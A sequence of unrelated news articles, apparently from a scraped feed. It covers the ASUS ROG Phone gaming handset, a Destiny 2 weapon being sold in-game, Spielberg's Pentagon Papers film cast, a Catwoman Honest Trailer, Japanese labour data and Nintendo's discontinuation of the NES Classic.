Thanks to the likes of PUBG and Fortnite arriving on mobile, gaming smartphones seem like a no-brainer for brands that want to break into the crowded smartphone world, with the Razer Phone setting the bar for others to follow. ASUS thinks it can do better. Here at Computex, the company surprised many by unveiling the ROG Phone, its first-ever handset made specifically with gaming in mind.
Needless to say, this aggressive-looking device is specced out as a powerhouse, but it’s also packed with many unique and thoughtful features that aim to deliver a better gaming experience. Not to mention the handful of dedicated accessories as well — including an external cooling fan that clips onto the back, plus an optional handheld dock that adds a second screen to the ROG Phone.
As with most other 2018 flagship smartphones, the ROG Phone is powered by Qualcomm’s flagship octa-core Snapdragon 845 chipset, but in this case, it’s been giving a little boost in its top CPU clock speed — going from the standard 2.8GHz up to 2.96GHz, which is a first in mobile. Another unique feature here is the 6-inch 2,160 x 1,080 AMOLED screen, which supports HDR content (no word on which standards yet) and runs at 90Hz with a 1ms response rate. Even though this isn’t quite as fast as the Razer Phone’s 120Hz LCD, it’s still apparently the fastest AMOLED display on a smartphone, not to mention its advantages over LCD in terms of color gamut and contrast ratio. But if you prefer, you can use the phone’s built-in 802.11ad WiGig connectivity to mirror your gameplay to a nearby TV via ASUS’ WiGig Dock, so long as your handset has a direct line of sight to the receiver.
There’s no word on storage space yet, but ASUS did share that the device will come with a whopping 8GB of RAM, which is the least you’d expect from a serious gaming smartphone. You’ll also find a pair of front-facing speakers, the same cameras as the ZenFone 5 (8MP front, 12MP/8MP ultra-wide on the back) and a rear fingerprint reader. As a bonus, there’s a silver ROG logo on the back which actually features a programmable RGB backlight: Using the dedicated app, you can choose a static color, have it pulsating, strobing, cycling through various colors or switched off entirely. Better yet, you can synchronize this RGB setting with other ASUS Aura Sync products; you can even synchronize up to five ROG Phones, which would look pretty cool in an eSports tournament.

The most surprising feature might be that the phone comes with not one, but three USB-C ports. In portrait, there’s the usual one at the bottom, and then two conjoined ports on the left. The idea here is that you’d be able to keep the phone plugged into a power source, but without the cable getting in the way of either of your hands. As to why these ports are conjoined, well, they are actually designed for a handful of specially-made accessories — more on those later.
Another unusual feature on the ROG Phone is the presence of three ultrasonic sensors. Two of these serve as programmable shoulder triggers for landscape gaming, which lets you see more of the screen since your index fingers are now out of the way. These triggers worked surprisingly well during my brief Asphalt 9 gameplay.
When holding the phone in portrait, you’ll find the third sensor at the bottom of the left side, and together with its counterpart on the right, it lets you squeeze the phone to quickly toggle apps — very much like the feature on recent HTC flagships, except those phones use strain gauges instead of ultrasonic sensors found on ROG’s device.
All of that etra processing power on the ROG Phone is backed by its generous 4,000mAh battery — this is supported by ASUS HyperCharge which essentially moved the charging chip to the power adapter in order to reduce heat inside the phone. More importantly, there’s a “3D vapor-chamber cooling system” — essentially a massive slab of copper heat radiator plus some carbon cooling pads attached to the circuit board — that covers most parts of the phone internally. This apparently provides 16 times more heat dissipation area than a standard smartphone cooling design, thus allowing a longer CPU peak endurance by up to five folds.
But that’s (still!) not all, as ASUS is also throwing in an “AeroActive Cooler” that clips onto the phone’s curved glass back. This plugs into the conjoined USB-C ports to power its fan and RGB logo, and both can be configured in the companion app mentioned earlier. Personally, I found that the attachment could sometimes get in the way of my hands. Maybe I could get used to it over time? I’m not sure. On the positive side, this attachment also has a 3.5mm headphone jack, meaning you have a second option to suit your phone’s orientation needs.
The AeroActive Cooler is just one of the many bizarre accessories made for the ROG Phone. The most intriguing of all is the optional TwinView Dock which, as you can tell by the name, is a handheld grip that comes with a second screen plus extra battery juice (capacity to be confirmed). You simply attach the phone to the top via the conjoined USB ports, and then you’ll be able to play your game in your choice of screen, leaving the other for watching reactions from viewers of your hypothetical gameplay stream. ASUS is also hoping to get developers to come up with games that make use of both screens, which would effectively turn the ROG Phone into a Android-powered Nintendo DS-a-like. With the lack of connectivity and content, I wasn’t able to fully appreciate this dual-screen option, but I do wish that the final product will be lighter. And if you prefer the good ol’ physical buttons for gaming, like most of us, ASUS has teamed up with Gamevice to create a clamp-on controller pad for the ROG Phone.
Last but not least, there’s the Mobile Desktop Dock which is rather self-explanatory, but what makes it stand out from Samsung’s similar dock is that it can be plugged into a PC, and with a simple click of a button, you can use the same monitor, mouse and keyboard to access either the PC or the ROG Phone. A bit like a KVM switch, if you like, which makes this setup a lot more versatile.
ASUS’ ROG Phone is certainly shaping up to be the most ambitious gaming phone since Nokia’s N-Gage. In fact, it’s safe to say that this even puts the recent Razer Phone to shame with all these extra features. But is there really a market for this kind of product? We shall see when it launches later this year — some time in Q3.

Bungie responded to Destiny 2 player’s complaints by cancelling a planned “Curse of Osiris” DLC livestream to detail new changes. The developers added more endgame rewards, a new weapon class and an improved economy to address those concerns.
Recently, a massively overpowered, game breaking laser gun called the Prometheus Lens was available to high-level players as a random drop, making it too easy for those who found it to dominate the PVP maps. Bungie had plans to fix the issue, but maybe it’s grown tired of all the whining, since Destiny 2‘s exotic weapons sales-alien, Xur, has the gun on sale for anyone who wants it.
Did you make a bet that we wouldn’t let Xur sell Prometheus Lens?
It’s available in the EDZ. Your move.

The effect of everyone having such a high-range BFG on PVP modes right now is hilariously predictable, of course. Kotaku’s Kirk Hamilton said that “the Laser Pointer of Doom” is like an instant-delete button.
In lieu of a (still-incoming) proper fix, Bungie gets to give a little bit of a finger to its sometimes toxic community and garner some “fun” news coverage. Maybe this will encourage us all to drop back into the game over the weekend and even get our butts to Mercury.

Sometimes director Steven Spielberg can toil away for years trying to find the perfect combination of elements to tell a story, and other times he’s able to fast-track the entire process from idea to finished product in less than a year. He’s doing the latter with a new film called The Papers (formerly known as The Post): he signed on in March and the movie comes out this December. It tells the true story of the controversial publication of classified documents known as the Pentagon Papers in the early 1970s.
Spielberg had already managed to snag Tom Hanks and Meryl Streep to star, but now he’s assembled a spectacular supporting cast to join his heavy hitters, including actors from Mad Men, Breaking Bad, Arrested Development, Fargo, and more. Ain’t no party like a Spielberg party. Read who else has come on board the filmmaker’s Pentagon Papers movie below.
Variety reports that the cast list now features Alison Brie, Carrie Coon, David Cross, Bruce Greenwood, Pat Healy, Tracy Letts, Bob Odenkirk, Sarah Paulson, Jesse Plemons, Matthew Rhys, Michael Stuhlbarg, Bradley Whitford, and Zach Woods. That is probably one of the most exciting casts in recent memory (and it’s surprising just how many genuinely funny people have joined a project that sounds so austere).
The film, set in 1971, centers on The Washington Post’s editor Ben Bradlee (Hanks) and its publisher Kay Graham (Streep) as they face off against the U.S. government over the publication of the “Pentagon Papers,” a series of classified military documents leaked to the press by a military analyst. The report revealed how President Johnson’s administration had lied to Congress and the American people about key details of the Vietnam War, and when Nixon administration attempted to suppress the report, they stood up and fought for the right to share that information with the American public.
Spielberg and writer Liz Hannah have excellent timing with this project because of the modern relevance it has under the Trump administration. As our president continues to wage war against legitimate news outlets like the Post and The New York Times, a movie about journalists pushing back against the bullshit to give people the truth has once again become a political statement. The fact that this ensemble cast has signed on is as close to a guarantee that this’ll be an entertaining movie as you can get these days.
You may have seen photos pop up recently of Spielberg, Hanks, and Streep prepping for this movie by attending a Washington Post editorial meeting:

Filming is already in progress. The Papers opens in limited release on December 22, 2017 for an Oscar-qualifying run before expanding wide on January 12, 2018.

This week brings Wonder Woman to theaters, marking the first time that a major female superhero is getting her own film franchise. Sadly, it’s not the first time a female comic book character was given her own movie though, and Honest Trailers has taken a look back at one such disastrous attempt that also hails from Warner Bros. Pictures and DC Comics.
Catwoman is one of the most iconic villains from Batman’s rogues gallery, so how does a movie focusing on the feline vixen without any Dark Knight to scratch turn out? Well, it turns out to be a complete nonsensical nightmare that makes absolutely no sense and is easily the worst thing Halle Berry has done, not just in her career, but her life.
Watch the Catwoman Honest Trailer after the jump.
Even if you’ve never seen the movie, this Honest Trailer gives you an idea of just how ridiculous it is, and how lucky you’ve been to avoid it. Then again, I imagine the laughs you might have from a production such as this are priceless.
It’s sad to think that at one point Warner Bros. Pictures thought this was a smart investment. Not only is a Catwoman movie without any ties to the comic book mythology of the character just an awful idea, but so is making the central character nothing but an excuse to get Halle Berry into a sexy, revealing, completely impractical outfit for no good reason. Sure, Catwoman has been a character sexualized in the comic books over and over again, but this movie makes no attempt to make her anything more than that.

You’d be pretty chuffed if you were looking for a job in Japan right now.
Unemployment sits at ultra-low levels while the ratio of jobs per job seeker just hit the highest level since the mid-1970’s.
Good odds for jobseekers in anyone’s language.
According to figures released by the Japanese government earlier today, the nation’s unemployment rate held steady at 2.8% in April, equaling the lowest level that it’s been since June 1994.
Not only is unemployment ridiculously low, the jobs to applicants ratio — a figure derived by simply dividing the number of job opening to current job seekers — jumped to 1.48 from 1.45 in April, leaving it at the highest level since February 1974.
Put another way, for every 100 people seeking work, there are currently 148 positions available.
That’s the kind of ratio unemployed workers in other advanced economies could only dream of.
While finding a job based on that metric is now easier than at any point in the past four decades, those who find employment shouldn’t expect a hefty pay increase anytime soon.
It’s the one feature in an otherwise extremely tight labour market that just won’t budge — wage growth.
And not only are wages failing to grow, they’re actually going backwards.
According to data released by the Japanese government earlier this month, nominal wages fell by 0.4% to ¥277,512 per worker in the year to March this year.
Adjusting for inflation, real wage growth fared even worse, sliding by 0.8% over the same period.
While a 1.9% drop in average hours worked per employee contributed to the headline fall, it still doesn’t fully explain why wages aren’t growing despite tight labour market conditions.
It’s a conundrum, and one that policymakers at the Bank of Japan need to solve if they want to stir inflationary pressures back to its 2% medium-term target.

Nearly half a year later, the NES Classic Edition continues to be an elusive beast. And as of mid-April, it’s a collector’s item — Nintendo has officially discontinued the NES.
Here’s the wording straight from the horse’s mouth, provided to IGN by Nintendo:
“Throughout April, [Nintendo of America] territories will receive the last shipments of Nintendo Entertainment System: NES Classic Edition systems for this year. We encourage anyone interested in obtaining this system to check with retail outlets regarding availability. We understand that it has been difficult for many consumers to find a system, and for that, we apologize. We have paid close attention to consumer feedback, and we greatly appreciate the incredible level of consumer interest and support for this product.”
So! Why in the world would Nintendo discontinue one of its most popular products in years? There are a few reasons, and you’re probably not going to like any of them.
Nintendo
Nintendo has been in the dumps for the past few years:
• Its latest console, the Wii U, had been a flop.
• Its portable console, the 3DS, was fading.
• With few exceptions — “Super Mario Maker,” for instance — Nintendo’s stable of hit franchises was stagnating.
In so many words, Nintendo, a company that once dominated the video game market internationally, was fading from relevance and losing to its competition. The NES Classic Edition was an amazing way to at once remind people of their love for Nintendo and break back into mainstream attention.
It’s a box that looks identical to a miniaturized NES console — Nintendo’s most iconic game console — and comes with all your favorite classics (“Super Mario Bros.,” “The Legend of Zelda,” etc.). More important, it’s just $ 60. It’s the perfect combination of nostalgia and low cost.
If you get one before production ends this month, you’re thinking about Nintendo (and maybe buying that new Nintendo Switch console that you keep hearing good things about?). If you can’t find one, you’re still thinking about Nintendo (and maybe buying that new Nintendo Switch console that you keep hearing good things about?).
Either way, Nintendo managed to put its brand back in the spotlight. That was the point.
Ben Gilbert / Business Insider
Nintendo has some of the most serious, dedicated fans of any company in entertainment — rivaling the likes of Marvel and Disney. These are the kind of fans who get tattooed, who name their pets and children after Nintendo game characters, who begrudgingly buy their fifth or sixth copy of “Super Mario World” on yet another new piece of Nintendo hardware.
I should know. I’m one of these people.
And the NES Classic Edition, while a commercial for Nintendo itself, is a gushing love letter aimed at Nintendo’s most serious fans. It’s no surprise it’s available only for a limited time — if everyone could get it, it wouldn’t be a collector’s item.
This is, of course, driving up resale costs and frustrating the hell out of people who can’t find the system. But that’s how artificial supply constraint works.
Nintendo
If people are busy buying the NES Classic Edition, they’re unlikely to rush out to buy another new Nintendo game console anytime soon. At least that’s what Nintendo is betting on, and it likely has data to back up the assertion.
It’s no mistake that the Switch launched five months after the NES Classic Edition, in early March. If the Switch and the NES Classic Edition had both launched last holiday season, the hype for the mini NES Classic Edition would’ve surely overshadowed that for the Switch.
That’s an especially important point: The Switch is Nintendo’s future. It’s the console that Nintendo is betting the next five to 10 years on.
The NES Classic Edition is a short-term profit with no extendability — you can’t buy games for it, nor can you download them. It’s a one-and-done revenue generator for Nintendo. The Switch is an ongoing revenue generator for Nintendo. That’s a tremendously important difference.
